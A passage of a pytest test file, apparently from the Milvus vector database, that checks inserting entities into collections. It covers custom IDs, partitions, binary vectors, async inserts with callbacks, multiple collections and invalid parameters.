"limit": 10,
}
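# A single-query search request against the default float-vector field: one
# random query vector, L2 distance with nprobe=10, returning the top 10 hits.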
class TestInsertBase:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=ut.gen_simple_index()
)
def get_simple_index(self, request, connect):
if request.param["index_type"] in ut.index_cpu_not_support():
pytest.skip("CPU not support index_type: ivf_sq8h")
log.info(request.param)
return request.param
@pytest.fixture(
scope="function",
params=ut.gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_empty_entity(self, connect, collection):
"""
target: test insert with empty entity list
method: set empty entity list as insert method params
expected: raises a ParamError exception
"""
entities = []
with pytest.raises(ParamError) as e:
connect.insert(collection, entities)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_none(self, connect, collection):
"""
target: test insert with None
method: set None as insert method params
expected: raises a ParamError
"""
entity = None
with pytest.raises(Exception) as e:
connect.insert(collection, entity)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_collection_not_existed(self, connect):
"""
        target: test insert with a collection that does not exist
        method: insert entities into a randomly named collection
expected: raise a BaseException
"""
collection_name = ut.gen_unique_str(uid)
with pytest.raises(BaseException) as e:
connect.insert(collection_name, default_entities)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_without_connect(self, dis_connect, collection):
"""
target: test insert entities without connection
method: create collection and insert entities in it, check if inserted successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.insert(collection, default_entities)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_drop_collection(self, connect, collection):
"""
target: test delete collection after insert entities
method: insert entities and drop collection
expected: has_collection false
"""
result = connect.insert(collection, default_entity)
assert len(result.primary_keys) == 1
connect.drop_collection(collection)
assert connect.has_collection(collection) == False
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_flush_drop_collection(self, connect, collection):
"""
        target: test drop collection after inserting and flushing entities
        method: insert entities, flush, and drop collection
expected: has_collection false
"""
result = connect.insert(collection, default_entity)
assert len(result.primary_keys) == 1
connect.flush([collection])
connect.drop_collection(collection)
assert connect.has_collection(collection) == False
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_create_index(self, connect, collection, get_simple_index):
"""
        target: test building an index after inserting entities
        method: insert entities, then build index
expected: no error raised
"""
result = connect.insert(collection, default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
ut.create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_after_create_index(self, connect, collection, get_simple_index):
"""
        target: test inserting entities after building an index
        method: build index, then insert entities
expected: no error raised
"""
connect.create_index(collection, field_name, get_simple_index)
result = connect.insert(collection, default_entities)
assert len(result.primary_keys) == default_nb
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
ut.create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_search(self, connect, collection):
"""
        target: test search after inserting entities
        method: insert entities, flush, load collection, and search
expected: no error raised
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
res = connect.search(collection, **default_single_query)
assert len(res[0]) == ut.default_top_k
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_segment_row_count(self, connect, collection):
nb = ut.default_segment_row_limit + 1
result = connect.insert(collection, ut.gen_entities(nb))
connect.flush([collection])
assert len(result.primary_keys) == nb
stats = connect.get_collection_stats(collection)
assert len(stats['partitions'][0]['segments']) == 2
for segment in stats['partitions'][0]['segments']:
assert segment['row_count'] in [ut.default_segment_row_limit, 1]
@pytest.fixture(
scope="function",
params=[
1,
2000
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids(self, connect, id_collection, insert_count):
"""
        target: test insert entities in collection, using customized ids
        method: create collection and insert entities in it, check the ids returned and
                the collection length after entities inserted
        expected: the returned ids match the customized ids and the collection
                  row count equals the insert count
"""
nb = insert_count
ids = [i for i in range(nb)]
entities = ut.gen_entities(nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities)
connect.flush([id_collection])
assert len(result.primary_keys) == nb
assert result.primary_keys == ids
stats = connect.get_collection_stats(id_collection)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_the_same_ids(self, connect, id_collection, insert_count):
"""
        target: test insert vectors in collection, using the same customized id for all
        method: create collection and insert vectors in it, check the ids returned and
                the collection length after vectors inserted
        expected: the returned ids match and the collection row count equals the insert count
"""
nb = insert_count
ids = [1 for i in range(nb)]
entities = ut.gen_entities(nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities)
connect.flush([id_collection])
assert len(result.primary_keys) == nb
assert result.primary_keys == ids
stats = connect.get_collection_stats(id_collection)
assert stats[row_count] == nb
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids_fields(self, connect, get_filter_field, get_vector_field):
"""
target: test create normal collection with different fields, insert entities with customized ids
method: create collection with diff fields: metric/field_type/..., insert, and count
expected: row count correct
"""
nb = 5
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = ut.gen_unique_str("test_collection")
fields = {
"fields": [ut.gen_primary_field(), filter_field, vector_field],
"auto_id": False
}
connect.create_collection(collection_name, fields)
ids = [i for i in range(nb)]
entities = ut.gen_entities_by_fields(fields["fields"], nb, ut.default_dim, ids)
log.info(entities)
result = connect.insert(collection_name, entities)
assert result.primary_keys == ids
connect.flush([collection_name])
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_not_match(self, connect, id_collection, insert_count):
"""
target: test insert entities in collection without ids
method: create id_collection and insert entities without ids
expected: exception raised
"""
nb = insert_count
with pytest.raises(Exception) as e:
entities = ut.gen_entities(nb)
del entities[0]
connect.insert(id_collection, entities)
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_twice_ids_no_ids(self, connect, id_collection):
"""
target: check the result of insert, with params ids and no ids
method: test insert vectors twice, use customize ids first, and then use no ids
expected: BaseException raised
"""
ids = [i for i in range(default_nb)]
entities = copy.deepcopy(default_entities)
entities[0]["values"] = ids
connect.insert(id_collection, entities)
with pytest.raises(Exception) as e:
del entities[0]
connect.insert(id_collection, entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_not_ids(self, connect, id_collection):
"""
target: test insert entities into an id_collection without ids
method: create id_collection and insert entities with no ids provided
expected: error raised
"""
entities = copy.deepcopy(default_entities)
del entities[0]
with pytest.raises(Exception) as e:
connect.insert(id_collection, entities)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_ids_length_not_match_batch(self, connect, id_collection):
"""
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise exception
"""
ids = [i for i in range(1, default_nb)]
log.info(len(ids))
entities = copy.deepcopy(default_entities)
entities[0]["values"] = ids
with pytest.raises(Exception) as e:
connect.insert(id_collection, entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_length_not_match_single(self, connect, id_collection):
"""
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise exception
"""
ids = [i for i in range(1, default_nb)]
log.info(len(ids))
entity = copy.deepcopy(default_entity)
entity[0]["values"] = ids
with pytest.raises(Exception) as e:
connect.insert(id_collection, entity)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_partition(self, connect, collection):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it, with the partition_name param
expected: the collection row count equals to nb
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
assert connect.has_partition(collection, default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_partition_with_ids(self, connect, id_collection):
"""
target: test insert entities in collection created before, insert with ids
method: create collection and insert entities in it, with the partition_name param
expected: the collection row count equals to nb
"""
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
entities = ut.gen_entities(default_nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities, partition_name=default_tag)
assert result.primary_keys == ids
log.info(connect.describe_collection(id_collection))
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_default_partition(self, connect, collection):
"""
target: test insert entities into default partition
method: create partition and insert into collection without tag params
expected: the collection row count equals to nb
"""
result = connect.insert(collection, default_entities, partition_name=ut.default_partition_name)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_partition_not_existed(self, connect, collection):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it, with the not existed partition_name param
expected: error raised
"""
tag = ut.gen_unique_str()
with pytest.raises(Exception) as e:
connect.insert(collection, default_entities, partition_name=tag)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_partition_repeatedly(self, connect, collection):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it repeatedly, with the partition_name param
expected: the collection row count equals to 2 * nb
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
res = connect.get_collection_stats(collection)
assert res[row_count] == 2 * default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_dim_not_matched(self, connect, collection):
"""
target: test insert entities, the vector dimension is not equal to the collection dimension
method: the entities dimension is half of the collection dimension, check the status
expected: error raised
"""
vectors = ut.gen_vectors(default_nb, int(ut.default_dim) // 2)
insert_entities = copy.deepcopy(default_entities)
insert_entities[-1]["values"] = vectors
with pytest.raises(Exception) as e:
connect.insert(collection, insert_entities)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_name_not_match(self, connect, collection):
"""
target: test insert entities, with the entity field name updated
method: update entity field name
expected: error raised
"""
tmp_entity = ut.update_field_name(copy.deepcopy(default_entity), "int64", "int64new")
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_type_not_match(self, connect, collection):
"""
target: test insert entities, with the entity field type updated
method: update entity field type
expected: error raised
"""
tmp_entity = ut.update_field_type(copy.deepcopy(default_entity), "int64", DataType.FLOAT)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_value_not_match(self, connect, collection):
"""
target: test insert entities, with the entity field value updated
method: update entity field value
expected: error raised
"""
tmp_entity = ut.update_field_value(copy.deepcopy(default_entity), DataType.FLOAT, 's')
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_with_field_more(self, connect, collection):
"""
target: test insert entities, with more fields than collection schema
method: add entity field
expected: error raised
"""
tmp_entity = ut.add_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_vector_more(self, connect, collection):
"""
target: test insert entities, with more fields than collection schema
method: add entity vector field
expected: error raised
"""
tmp_entity = ut.add_vector_field(default_nb, ut.default_dim)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_less(self, connect, collection):
"""
target: test insert entities, with less fields than collection schema
method: remove entity field
expected: error raised
"""
tmp_entity = ut.remove_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_vector_less(self, connect, collection):
"""
target: test insert entities, with less fields than collection schema
method: remove entity vector field
expected: error raised
"""
tmp_entity = ut.remove_vector_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_no_field_vector_value(self, connect, collection):
"""
target: test insert entities, with no vector field value
method: remove entity values of vector field
expected: error raised
"""
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["values"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_no_field_vector_type(self, connect, collection):
"""
target: test insert entities, with no vector field type
method: remove entity vector field
expected: error raised
"""
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["type"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_no_field_vector_name(self, connect, collection):
"""
target: test insert entities, with no vector field name
method: remove entity vector field
expected: error raised
"""
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["name"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
# todo fix timeout
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.timeout(30)
def test_collection_insert_rows_count_multi_threading(self, args, collection):
"""
target: test collection rows_count is correct or not with multi threading
method: create collection and insert entities in it(idmap),
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
if args["handler"] == "HTTP":
pytest.skip("Skip test in http mode")
thread_num = 8
threads = []
milvus = ut.get_milvus(host=args["ip"], port=args["port"], handler=args["handler"], try_connect=False)
def insert(thread_i):
log.info("In thread-%d" % thread_i)
result = milvus.insert(collection, default_entities)
milvus.flush([collection])
for i in range(thread_num):
x = threading.Thread(target=insert, args=(i,))
threads.append(x)
x.start()
for th in threads:
th.join()
stats = milvus.get_collection_stats(collection)
assert stats[row_count] == thread_num * default_nb
# TODO: unable to set config
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_disable_auto_flush(self, connect, collection):
"""
target: test insert entities, with disable auto-flush
method: disable auto-flush and insert, get entity
expected: entities are fetched by id, but values are None before flush
"""
delete_nums = 500
ut.disable_flush(connect)
result = connect.insert(collection, default_entities)
ids = result.primary_keys
res = connect.get_entity_by_id(collection, ids[:delete_nums])
assert len(res) == delete_nums
assert res[0] is None
class TestInsertBinary:
@pytest.fixture(
scope="function",
params=ut.gen_binary_index()
)
def get_binary_index(self, request):
request.param["metric_type"] = "JACCARD"
return request.param
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_entities(self, connect, binary_collection):
"""
target: test insert entities in binary collection
method: create collection and insert binary entities in it
expected: the collection row count equals to nb
"""
result = connect.insert(binary_collection, default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_partition(self, connect, binary_collection):
"""
target: test insert entities and create partition tag
method: create collection and insert binary entities in it, with the partition_name param
expected: the collection row count equals to nb
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
assert connect.has_partition(binary_collection, default_tag)
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_binary_multi_times(self, connect, binary_collection):
"""
target: test insert entities multi times and final flush
method: create collection, insert binary entities one by one, and flush once at the end
expected: the collection row count equals to nb
"""
for i in range(default_nb):
result = connect.insert(binary_collection, default_binary_entity)
assert len(result.primary_keys) == 1
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_after_create_index(self, connect, binary_collection, get_binary_index):
"""
target: test insert binary entities after build index
method: build index and insert entities
expected: no error raised
"""
connect.create_index(binary_collection, binary_field_name, get_binary_index)
result = connect.insert(binary_collection, default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
index = connect.describe_index(binary_collection, "")
ut.create_target_index(get_binary_index, binary_field_name)
assert index == get_binary_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_binary_create_index(self, connect, binary_collection, get_binary_index):
"""
target: test build index after inserting binary entities
method: insert binary entities, then build index
expected: no error raised
"""
result = connect.insert(binary_collection, default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_binary_index)
index = connect.describe_index(binary_collection, "")
ut.create_target_index(get_binary_index, binary_field_name)
assert index == get_binary_index
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_search(self, connect, binary_collection):
"""
target: test search binary entities after insert
method: insert binary entities, flush, load and search collection
expected: no error raised
"""
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
query, _ = ut.gen_search_vectors_params(binary_field_name, default_binary_entities,
ut.default_top_k, 1, metric_type="JACCARD")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
log.debug(res)
assert len(res[0]) == ut.default_top_k
class TestInsertAsync:
@pytest.fixture(scope="function", autouse=True)
def skip_http_check(self, args):
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
@pytest.fixture(
scope="function",
params=[
1,
1000
],
)
def insert_count(self, request):
yield request.param
def check_status(self, result):
log.info("In callback check status")
assert not result
def check_result(self, result):
log.info("In callback check results")
assert result
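# Illustrative note (a sketch of the async pattern these tests rely on, not
# part of the original file): an _async insert returns a future, and an
# optional _callback receives the outcome so assertions can run inside it:
#
#   future = connect.insert(collection, entities, _async=True,
#                           _callback=self.check_result)
#   future.done()                        # wait for completion / callback
#   ids = future.result().primary_keys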
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async(self, connect, collection, insert_count):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = insert_count
future = connect.insert(collection, ut.gen_entities(nb), _async=True)
ids = future.result().primary_keys
connect.flush([collection])
assert len(ids) == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_false(self, connect, collection, insert_count):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = insert_count
result = connect.insert(collection, ut.gen_entities(nb), _async=False)
connect.flush([collection])
assert len(result.primary_keys) == nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async_callback(self, connect, collection, insert_count):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = insert_count
future = connect.insert(collection, ut.gen_entities(nb), _async=True, _callback=self.check_result)
future.done()
ids = future.result().primary_keys
assert len(ids) == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_long(self, connect, collection):
"""
target: test async insert with a large number of entities
method: insert 50000 entities with _async=True and a result callback
expected: length of ids is equal to the number of entities inserted
"""
nb = 50000
future = connect.insert(collection, ut.gen_entities(nb), _async=True, _callback=self.check_result)
result = future.result()
assert len(result.primary_keys) == nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
log.info(stats)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_callback_timeout(self, connect, collection):
"""
target: test async insert with a short timeout
method: insert a large batch with timeout=1 and a status callback
expected: exception raised when fetching the result
"""
nb = 100000
future = connect.insert(collection, ut.gen_entities(nb), _async=True, _callback=self.check_status, timeout=1)
with pytest.raises(Exception) as e:
result = future.result()
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_invalid_params(self, connect):
"""
target: test async insert into a collection that does not exist
method: insert entities with _async=True into an uncreated collection
expected: exception raised when fetching the result
"""
collection_new = ut.gen_unique_str()
future = connect.insert(collection_new, default_entities, _async=True)
future.done()
with pytest.raises(Exception) as e:
result = future.result()
# 1339
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_invalid_params_raise_exception(self, connect, collection):
"""
target: test async insert with empty entities
method: insert an empty entity list with _async=True
expected: exception raised when fetching the result
"""
entities = []
future = connect.insert(collection, entities, _async=True)
future.done()
with pytest.raises(Exception) as e:
future.result()
class TestInsertMultiCollections:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=ut.gen_simple_index()
)
def get_simple_index(self, request, connect):
log.info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.mark.tags(CaseLabel.L1)
def test_insert_entity_multi_collections(self, connect):
"""
target: test insert entities
method: create 10 collections and insert entities into them in turn
expected: row count equals nb for each collection
"""
collection_num = 10
collection_list = []
for i in range(collection_num):
collection_name = ut.gen_unique_str(uid)
collection_list.append(collection_name)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection_name, default_entities)
connect.flush([collection_name])
assert len(result.primary_keys) == default_nb
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == default_nb
for i in range(collection_num):
connect.drop_collection(collection_list[i])
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_collection_insert_entity_another(self, connect, collection):
"""
target: test insert vector to collection_1 after collection_2 deleted
method: delete collection_2 and insert vector to collection_1
expected: row count equals the length of entities inserted
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.drop_collection(collection)
result = connect.insert(collection_name, default_entity)
connect.flush([collection_name])
assert len(result.primary_keys) == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_create_index_insert_entity_another(self, connect, collection, get_simple_index):
"""
target: test insert vector to collection_2 after build index for collection_1
method: build index and insert vector
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.create_index(collection, field_name, get_simple_index)
result = connect.insert(collection_name, default_entity)
assert len(result.primary_keys) == 1
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
ut.create_target_index(get_simple_index, field_name)
assert index == get_simple_index
connect.drop_collection(collection_name)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_entity_create_index_another(self, connect, collection, get_simple_index):
"""
target: test build index for collection_2 after inserting entity into collection_1
method: insert entity into one collection and build index on the other
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.create_index(collection_name, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection_name, "")
ut.create_target_index(get_simple_index, field_name)
assert index == get_simple_index
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_entity_sleep_create_index_another(self, connect, collection, get_simple_index):
"""
target: test build index for collection_2 a while after inserting entity into collection_1
method: insert entity into one collection, flush, and build index on the other
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.create_index(collection_name, field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L1)
def test_search_entity_insert_entity_another(self, connect, collection):
"""
target: test insert entity to collection_1 after search collection_2
method: search collection and insert entity
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.load_collection(collection)
res = connect.search(collection, **default_single_query)
assert len(res[0]) == 0
connect.insert(collection_name, default_entity)
connect.flush([collection_name])
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_entity_search_entity_another(self, connect, collection):
"""
target: test search collection_2 after inserting entity into collection_1
method: insert entity into one collection and search the other
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.load_collection(collection_name)
res = connect.search(collection_name, **default_single_query)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_entity_sleep_search_entity_another(self, connect, collection):
"""
target: test search collection_2 a while after inserting entity into collection_1
method: insert entity into one collection, flush, and search the other
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.load_collection(collection_name)
res = connect.search(collection_name, **default_single_query)
assert len(res[0]) == 0
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_entity_during_release_collection(self, connect, collection):
"""
target: test insert entity during release
method: release collection async, then do insert operation
expected: insert ok
"""
for i in range(10):
connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
def release(collection):
connect.release_collection(collection)
t = threading.Thread(target=release, args=(collection,))
t.start()
result = connect.insert(collection, default_entities)
assert len(result.primary_keys) == default_nb
class TestInsertInvalid(object):
"""
Test inserting entities with invalid parameters
"""
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_ids_invalid(self, connect, id_collection, get_entity_id):
"""
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise exception
"""
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.insert(id_collection, default_entities, ids)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test insert with invalid scenario
method: insert with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception):
connect.insert(collection_name, default_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_partition_name(self, connect, collection, get_tag_name):
"""
target: test insert with invalid scenario
method: insert with invalid partition name
expected: raise exception
"""
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
if tag_name is not None:
with pytest.raises(Exception):
connect.insert(collection, default_entity, partition_name=tag_name)
else:
connect.insert(collection, default_entity, partition_name=tag_name)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_name(self, connect, collection, get_field_name):
"""
target: test insert with invalid field name
method: update entity field name to an invalid string, then insert
expected: raise exception
"""
tmp_entity = ut.update_field_name(copy.deepcopy(default_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_type(self, connect, collection, get_field_type):
"""
target: test insert with invalid field
method: insert with invalid field type
expected: raise exception
"""
field_type = get_field_type
tmp_entity = ut.update_field_type(copy.deepcopy(default_entity), 'float', field_type)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_value(self, connect, collection, get_field_int_value):
"""
target: test insert with invalid field
method: insert with invalid field value
expected: raise exception
"""
field_value = get_field_int_value
tmp_entity = ut.update_field_type(copy.deepcopy(default_entity), 'int64', field_value)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entity_value(self, connect, collection, get_field_vectors_value):
"""
target: test insert with invalid entity
method: insert with invalid entity value
expected: raise exception
"""
tmp_entity = copy.deepcopy(default_entity)
src_vector = tmp_entity[-1]["values"]
src_vector[0][1] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
class TestInsertInvalidBinary(object):
"""
Test inserting binary entities with invalid parameters
"""
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
